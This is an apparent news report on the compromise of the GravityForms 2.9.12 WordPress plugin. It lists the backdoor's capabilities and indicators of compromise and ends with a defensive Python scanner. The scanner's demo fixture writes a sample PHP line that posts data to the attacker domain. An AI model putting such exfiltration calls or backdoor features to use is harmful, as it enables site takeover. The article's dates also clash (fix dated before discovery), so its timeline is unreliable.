WordPress GravityForms Plugin Hacked to Include Malicious Code
A sophisticated supply chain attack has compromised the official GravityForms WordPress plugin, allowing attackers to inject malicious code that enables remote code execution on affected websites.
The attack, discovered on July 11, 2025, represents a significant security breach affecting one of WordPress’s most popular form-building plugins, with the malware being distributed directly through the official gravityforms.com domain.
Key Takeaways
1. A sophisticated supply chain attack compromised GravityForms version 2.9.12, injecting malware via the official plugin distribution.
2. The malware enabled remote code execution, data exfiltration, and persistent backdoor access using functions like update_entry_detail() and list_sections().
3. The malicious domain (gravityapi.org) was shut down, and the developer released a clean version (2.9.13) to stop further infections.
4. Users should update immediately and monitor for suspicious activity, especially unauthorized admin accounts or unusual PHP files.
GravityForms Plugin Hacked
The security breach was first identified by researchers at Patchstack, who received reports of suspicious HTTP requests to an unknown domain, gravityapi.org, originating from the GravityForms plugin.
The malicious domain was registered on July 8, 2025, just days before the attack was discovered, suggesting a carefully orchestrated campaign.
Initial investigations revealed that the compromised plugin version 2.9.12 contained malware that was being distributed through official channels, including manual downloads and Composer installations.
However, the attack appeared to have a limited window of opportunity, as RocketGenius, the developer of GravityForms, quickly responded to remove the malicious code from new downloads.
The company confirmed they were conducting a thorough investigation into the breach, and by July 7, 2025, they had released version 2.9.13 to ensure users could safely update without the backdoor present.
Additionally, domain registrar Namecheap suspended the gravityapi.org domain to prevent further exploitation.
The malware operated through two primary vectors, both designed to provide attackers with comprehensive control over infected WordPress installations.
The first method involved a malicious function called update_entry_detail(), embedded in the plugin's common.php file, which automatically executed whenever the plugin was active.
This function collected extensive system information from infected sites, including WordPress version, active plugins, user counts, and server details, then transmitted this data to the attacker-controlled domain.
The response from the malicious server contained base64-encoded payloads that were automatically saved to the infected site’s file system, creating persistent backdoors.
The second attack vector utilized a function called list_sections() that created a sophisticated backdoor system requiring a specific API token for access. This backdoor provided attackers with extensive capabilities:
- Creating administrator accounts with full privileges.
- Executing arbitrary PHP code through eval() functions.
- Uploading malicious files to the server filesystem.
- Listing and deleting existing user accounts.
- Performing comprehensive directory traversals.
- Maintaining persistent access even after discovery.
The malware was particularly dangerous because it could execute arbitrary PHP code through eval() functions, essentially giving attackers complete control over infected websites.
The backdoor also included functionality to create new administrator accounts, effectively ensuring persistent access even if the initial compromise was discovered.
Mitigations
While the full scope of the attack remains under investigation, preliminary assessments suggest the infection was not widespread, likely due to the short timeframe during which the malicious version was available.
Major web hosting companies have begun scanning their servers for indicators of compromise, with results suggesting limited distribution.
The attack highlights the critical vulnerabilities in software supply chains, where even trusted sources can be compromised.
The sophisticated nature of the malware, with its multiple backdoors and comprehensive system access capabilities, demonstrates the advanced techniques employed by modern cybercriminals.
Security firms have identified several indicators of compromise, including suspicious IP addresses (185.193.89.19 and 193.160.101.6), malicious files (bookmark-canonical.php and block-caching.php), and the specific API token used by the backdoor system.
Organizations using GravityForms are advised to immediately update to version 2.9.13 or later, conduct thorough security scans of their WordPress installations, and monitor for any unauthorized administrator accounts or suspicious file modifications.
This incident underscores the importance of maintaining robust security monitoring and the need for enhanced supply chain security measures in the software development ecosystem.
Indicators of Compromise (IoCs):
| Type | Indicator / Detail | Notes |
|---|---|---|
| IP Address | 185.193.89.19 | Potential malicious IP |
| IP Address | 193.160.101.6 | Potential malicious IP |
| Domain | gravityapi.org | Associated with compromise |
| Domain | gravityapi.io | Associated with compromise |
| File Path | gravityforms/common.php | Look for gravityapi.org and the update_entry_detail function |
| File Path | includes/settings/class-settings.php | Look for the list_sections function |
| File Path | wp-includes/bookmark-canonical.php | Suspicious file |
| File Path | wp-includes/block-caching.php | Suspicious file |
| Hash/String | Cx3VGSwAHkB9yzIL9Qi48IFHwKm4sQ6Te5odNtBYu6Asb9JX06KYAWmrfPtG1eP3 | Possibly a file hash, malware signature, or unique identifier |
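The following script turns the IoC table and the mitigation advice above into a filesystem check a site owner can run against a WordPress root. It is an added example, not code from Patchstack or RocketGenius; it assumes the plugin lives at the standard wp-content/plugins/gravityforms path, and the sample install it builds in demo() is constructed for illustration.

```python
"""Filesystem check for the GravityForms 2.9.12 indicators listed in the article.
Added defender-side example; not Patchstack's or RocketGenius's code."""
import os
import re
import tempfile

# Indicators copied from the IoC table above.
IOC_DOMAINS = ("gravityapi.org", "gravityapi.io")
IOC_IPS = ("185.193.89.19", "193.160.101.6")
IOC_FUNCTIONS = ("update_entry_detail", "list_sections")
IOC_TOKEN = "Cx3VGSwAHkB9yzIL9Qi48IFHwKm4sQ6Te5odNtBYu6Asb9JX06KYAWmrfPtG1eP3"
PLANTED_FILES = ("wp-includes/bookmark-canonical.php", "wp-includes/block-caching.php")
PLUGIN_DIR = "wp-content/plugins/gravityforms"      # assumed standard plugin location
PLUGIN_FILES = (PLUGIN_DIR + "/common.php", PLUGIN_DIR + "/includes/settings/class-settings.php")
STRONG = IOC_DOMAINS + IOC_IPS + (IOC_TOKEN,)
PATTERN = re.compile("|".join(re.escape(s) for s in STRONG + IOC_FUNCTIONS))

def scan_text(rel_path, text):
    """Findings for one file's contents as (severity, path, detail). A domain, IP or
    token hit is 'high'; a bare function name only warrants manual 'review'."""
    hits = sorted({m.group(0) for m in PATTERN.finditer(text)})
    return [("high" if h in STRONG else "review", rel_path, "contains " + h) for h in hits]

def scan_wordpress_root(root):
    """Check a WordPress install and return all findings; an empty list means no IoC seen."""
    findings = []
    for rel in PLANTED_FILES:                      # files the attacker wrote into wp-includes
        if os.path.exists(os.path.join(root, rel)):
            findings.append(("high", rel, "file named in IoC list is present"))
    for rel in PLUGIN_FILES:                       # plugin files that carried the backdoors
        full = os.path.join(root, rel)
        if os.path.isfile(full):
            with open(full, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_text(rel, fh.read()))
    return findings

def demo():
    """Build a constructed (fake) compromised install in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, PLUGIN_DIR), exist_ok=True)
        os.makedirs(os.path.join(root, "wp-includes"), exist_ok=True)
        with open(os.path.join(root, PLUGIN_FILES[0]), "w") as fh:   # constructed sample
            fh.write("<?php\nfunction update_entry_detail() {\n"
                     "  wp_remote_post('https://gravityapi.org/api/', $args);\n}\n")
        open(os.path.join(root, PLANTED_FILES[1]), "w").close()     # planted backdoor stub
        return scan_wordpress_root(root)

if __name__ == "__main__":
    for sev, path, detail in demo():
        print(sev, path, detail)
```

A 'review' hit on a function name alone is not proof of compromise; compare the file against a clean 2.9.13 copy before acting, and pair this check with a review of administrator accounts, which this script does not cover.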